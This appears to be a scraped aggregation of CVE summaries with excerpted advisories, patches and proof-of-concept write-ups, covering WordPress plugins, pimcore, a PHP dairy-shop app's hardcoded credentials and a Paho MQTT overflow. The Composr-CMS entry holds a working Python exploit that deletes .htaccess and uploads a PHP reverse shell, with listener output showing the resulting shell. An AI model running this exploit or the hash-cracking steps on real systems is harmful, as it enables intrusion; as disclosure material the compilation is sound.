Tongda2000 v11.10 was discovered to contain a SQL injection vulnerability in export_data.php via the d_name parameter.

CVE-2022-23902

Exposure of Sensitive Information to an Unauthorized Actor in Packagist pimcore/pimcore prior to 10.3.1.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Svg sanitization (#11386)

\* setting up the svg saniziter on logo and assets upload

\* more detailed exception message

\* changed to mime type check instead of file extension

\* adding the sanitization to "Upload new version"

\* refactor to sanitize on preAdd/preUpdate, rollback AssetController.php

\* fix resource|string, null given on mime\_content\_type

\* using symfony mime component + small tweaks

\* avoiding save without changes case

\* tweak when checking if is image type

*   Loading branch information

CVE-2022-0565: Svg sanitization (#11386) · pimcore/pimcore@7697f70

The CMP WordPress plugin before 4.0.19 allows any user, even not logged in, to arbitrarily change the coming soon page layout.

*   **cmp-coming-soon-maintenance/trunk/readme.txt**
    
    r2633406
    
    r2657597
    
     
    
    6
    
    6
    
    Requires PHP: 5.6
    
    7
    
    7
    
    Tested up to: 5.8
    
    8
    
     
    
    Stable tag: 4.0.18
    
     
    
    8
    
    Stable tag: 4.0.19
    
    9
    
    9
    
    License: GPLv2 or later
    
    10
    
    10
    
    License URI: https://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    161
    
    161
    
    162
    
    162
    
    \== Changelog ==
    
     
    
    163
    
    <h4>CMP 4.0.19 - 14-Jan-22</h4>
    
     
    
    164
    
    <ul>
    
     
    
    165
    
        <li>Fixed security issue, when unauthenticated user could update the CSS styles for CMP themes.</li>
    
     
    
    166
    
        <li>Updated purge caching function</li>
    
     
    
    167
    
    </ul>
    
    163
    
    168
    
    <h4>CMP 4.0.18 - 22-Nov-21</h4>
    
    164
    
    169
    
    <ul>

CVE-2022-0188: Changeset 2657597 for cmp-coming-soon-maintenance – WordPress Plugin Repository

Dairy Farm Shop Management System v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.

Exploit Title: Dairy Farm Shop Management System  — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access

**Date: 2020–12-25****Exploit Author: VIVEK PANDAY    ****Vendor Homepage: https://phpgurukul.com/****Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/****Version: 1.0****Tested on: Windows 10****Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149/****CVE:2020-36062**

**\[ Hardcoded Credentials:\]**

Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk.

**\[Attack Vectors\]**

An attacker can gain admin panel access using default credentials and do malicious activities

**Proof Of Concept**

1 Download source code from https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/

2 Now unzip it and go to the Database folder here we can see one SQL file.

3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.  
Mitigation:Always use a strong encryption algorithm like SHA-256 with SALT.Never use default credentials always change during installation time

CVE-2020-36062: CVE:2020-36062 Dairy Farm Shop Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access · Issue #3 · VivekPanday12/CVE-

Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/contact.php via the txtMsg parameters.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-24646: VULNERABLE: SQL Injection  exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/contact.php" via the ‘txtMsg’ parameters. · Issue #18 · kishan0725/

Authenticated remote code execution (RCE) in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a PHP shell through /adminzone/index.php?page=admin-commandr.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID: CVE-2021-46360

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

CVE-2021-46360: 0days/Exploit.py at main · sartlabs/0days

m1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

Errors from functions imagecreatefrom* and image* have not been checked properly. Although PHP issued warning and function returned false, original file (that could contain malicious payload) was kept on the disk.

**Impact**

All versions until v1.3.

**Patches**

Users should upgrade to v1.4.

CVE-2022-23626: Insufficient checking of uploaded files

The Ultimate Product Catalog WordPress plugin before 5.0.26 does not have authorisation and CSRF checks in some AJAX actions, which could allow any authenticated users, such as subscriber to call them and add arbitrary products, or change the plugin's settings for example

CVE-2021-24993: Changeset 2650578 – WordPress Plugin Repository

The IP2Location Country Blocker WordPress plugin before 2.26.5 does not have authorisation and CSRF checks in the ip2location_country_blocker_save_rules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing the frontend.

**ip2location-country-blocker/trunk/ip2location-country-blocker.php**

r2644207

r2652469

 

4

4

 \* Plugin URI: https://ip2location.com/resources/wordpress-ip2location-country-blocker

5

5

 \* Description: Block visitors from accessing your website or admin area by their country.

6

 

 \* Version: 2.26.4

 

6

 \* Version: 2.26.5

7

7

 \* Author: IP2Location

8

8

 \* Author URI: https://www.ip2location.com.

…

…

 

1635

1635

        }

1636

1636

1637

 

        // Ignore static files

1638

 

        if (preg\_match('/\\.(7z|apk|avi|avif|bin|bmp|bz2|class|css|csv|dmg|doc|docx|ejs|eot|eps|exe|flac|gif|gz|ico|iso|jar|jpeg|jpg|js|mid|midi|mkv|mp3|mp4|ogg|otf|pdf|pict|pls|png|ppt|pptx|ps|rar|svg|svgz|swf|tar|tif|tiff|ttf|webm|webp|woff|woff2|xls|xlsx|zip|zst)$/i', $\_SERVER\['REQUEST\_URI'\])) {

1639

 

            return;

1640

 

        }

1641

 

1642

 

        // Ignore internal XHR calls

1643

 

        if (preg\_match('/wp-json|admin-ajax|wc-ajax|jm-ajax|doing\_wp\_cron/', $\_SERVER\['REQUEST\_URI'\])) {

1644

 

            return;

 

1637

        // Ignore internal XHR & cron

 

1638

        if (isset($\_SERVER\['SCRIPT\_NAME'\])) {

 

1639

            if (in\_array(basename($\_SERVER\['SCRIPT\_NAME'\]), \['admin-ajax.php', 'ajax.php', 'cron.php', 'wp-cron.php'\])) {

 

1640

                return;

 

1641

            }

1645

1642

        }

1646

1643

…

…

 

1893

1890

        header('Content-Type: application/json');

1894

1891

 

1892

        if (!current\_user\_can('administrator')) {

 

1893

            die(json\_encode(\[

 

1894

                'status'  => 'ERROR',

 

1895

                'message' => \_\_('Permission denied.', 'ip2location-country-blocker'),

 

1896

            \]));

 

1897

        }

 

1898

1895

1899

        require\_once ABSPATH . 'wp-admin/includes/file.php';

1896

1900

        WP\_Filesystem();

…

…

 

2046

2050

        header('Content-Type: application/json');

2047

2051

 

2052

        if (!current\_user\_can('administrator')) {

 

2053

            die(json\_encode(\[

 

2054

                'status'  => 'ERROR',

 

2055

                'message' => \_\_('Permission denied.', 'ip2location-country-blocker'),

 

2056

            \]));

 

2057

        }

 

2058

2048

2059

        require\_once ABSPATH . 'wp-admin/includes/file.php';

2049

2060

        WP\_Filesystem();

…

…

 

2195

2206

        header('Content-Type: application/json');

2196

2207

 

2208

        if (!current\_user\_can('administrator')) {

 

2209

            die(json\_encode(\[

 

2210

                'status'  => 'ERROR',

 

2211

                'message' => \_\_('Permission denied.', 'ip2location-country-blocker'),

 

2212

            \]));

 

2213

        }

 

2214

2197

2215

        try {

2198

2216

            $token = (isset($\_POST\['token'\])) ? $\_POST\['token'\] : '';

…

…

 

2246

2264

    public function save\_rules()

2247

2265

    {

 

2266

        if (!current\_user\_can('administrator')) {

 

2267

            wp\_die(\_\_('Permission denied.', 'ip2location-country-blocker'));

 

2268

        }

 

2269

2248

2270

        $mode = (isset($\_POST\['mode'\])) ? $\_POST\['mode'\] : '';

2249

2271

        $countries = (isset($\_POST\['countries'\])) ? $\_POST\['countries'\] : '';

**ip2location-country-blocker/trunk/readme.txt**

r2644207

r2652469

 

6

6

Requires at least: 2.0

7

7

Tested up to: 5.8

8

 

Stable tag: 2.26.4

 

8

Stable tag: 2.26.5

9

9

10

10

Blocks unwanted visitors from accessing your frontend (blog pages) or backend (admin area) by countries or proxy servers.

…

…

 

89

89

90

90

\== Changelog ==

 

91

\* 2.26.5 Fixed security issues with CSRF.

91

92

\* 2.26.4 Removed missing Javascript.

92

93

\* 2.26.3 Updated default blocking template.

CVE-2021-25095: Changeset 2652469 – WordPress Plugin Repository

An out-of-bounds write vulnerability exists in the URL_decode functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.

**Summary**

An out-of-bounds write vulnerability exists in the readPacket functionality of Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can send a malicious MQTT message to trigger this vulnerability.

**Tested Versions**

Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0  
Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

Embedded Paho MQTTClient-C library - https://www.eclipse.org/paho/index.php?page=clients/c/embedded/index.php SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

The Embedded Paho MQTTClient-C library is a MQTT client library for the language C. This library is primarily designed for embedded devices.

This vulnerability was discovered while looking at the SeaConnect 370W. The mentioned device uses the Paho MQTTClient-C library version 1.0.0. In this version is present a buffer overflow vulnerability in the function readPacket. This was corrected in July 2017. This correction was treated as a security improvement, and no CVE was assigned to it. The consequence was that the SeaConnect 370W did not update its firmware with the correction. This, in turn, leads to a remote command execution vulnerability in the SeaConnect 370W due to the buffer overflow caused in the Paho MQTTClient-C library version 1.0.0.

The readPacket function in the SeaConnect 370W is:

      uint readPacket(MQTTClient *c,undefined4 param_2)
    
      {
        uint rc;
        undefined4 timer_;
        int iVar1;
        dword dVar2;
        undefined *ipstack;
        dword rem_len;
    
        read_volatile(PTR_DWORD_20012de8._0_1_);
        ipstack = c->ipstack;
        rem_len = 0;
        timer_ = TimerLeftMS(param_2);
        rc = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf,1,timer_);                                    [1]
                          /* calling mqttread ^ */
        if (rc == 1) {
          timer_ = TimerLeftMS(param_2);
          decodePacket(c,&rem_len,timer_);                                                                  [2]
          iVar1 = MQTTPacket_encode(c->readbuf + 1,rem_len);
          if (0 < (int)rem_len) {
            ipstack = c->ipstack;
            timer_ = TimerLeftMS(param_2);
            dVar2 = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf + iVar1 + 1,rem_len,timer_);           [3]
                          /* calling mqttread ^ */
            if (rem_len != dVar2) {
              return 1;
            }
          }
          rc = ((uint)(byte)*c->readbuf << 0x18) >> 0x1c;
        }
        return rc;
      }
    

This is a Paho MQTTClient-C’s function that handles a new MQTT mesage. It reads at [1] the heder byte and at [2] reads, from the packet, the remaining size of the packet. This size is then used at [3] to read into a heap buffer the remaining message.

The buffer used at [3], for the SeaConnect 370W, is allocated in SeaConnectMqtt_Init:

      void SeaConnectMqtt_Init(void)
    
      {
        [...]
        
        receiveBuffer_ptr = (int *)read_volatile_4(receiveBuffer);
        puVar1 = read_volatile_4(PTR_aSeaconnectmqtt_3_20010be8);
        if (*receiveBuffer_ptr == 0) {
          malloc_res = malloc(0x201);                                                                       [4]
          *receiveBuffer_ptr = malloc_res;
        [...]
        
        }
    

At [4] 0x201 bytes are allocated to manage a MQTT mesage, but the function readPacket does not control the size of the variable rem_len before reading the message content at [3]. This can lead to a buffer overflow.

The corrected Paho MQTTClient-C’s readPacket:

    static int readPacket(MQTTClient* c, Timer* timer)
    {
        MQTTHeader header = {0};
        int len = 0;
        int rem_len = 0;
    
        /* 1. read the header byte.  This has the packet type in it */
        int rc = c->ipstack->mqttread(c->ipstack, c->readbuf, 1, TimerLeftMS(timer));
        if (rc != 1)
            goto exit;
    
        len = 1;
        /* 2. read the remaining length.  This is variable in itself */
        decodePacket(c, &rem_len, TimerLeftMS(timer));
        len += MQTTPacket_encode(c->readbuf + 1, rem_len); /* put the original remaining length back into the buffer */
    
        if (rem_len > (c->readbuf_size - len))                                                              [5]
        {
            rc = BUFFER_OVERFLOW;
            goto exit;
        }
    
        /* 3. read the rest of the buffer using a callback to supply the rest of the data */
        if (rem_len > 0 && (rc = c->ipstack->mqttread(c->ipstack, c->readbuf + len, rem_len, TimerLeftMS(timer)) != rem_len)) {
            rc = 0;
            goto exit;
        }
    
        header.byte = c->readbuf[0];
        rc = header.bits.type;
    exit:
        return rc;
    }
    

A size check was introduced at [5] to avoid the buffer overflow.

The nature of the buffer overflow depends upon the library user. Indeed, the buffer used in readPacket is provided by the library utilizer and not allocated by the Paho MQTTClient-C library.

**Timeline**

2021-10-27 - Initial vendor contact  
2021-11-03 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

Tag

#php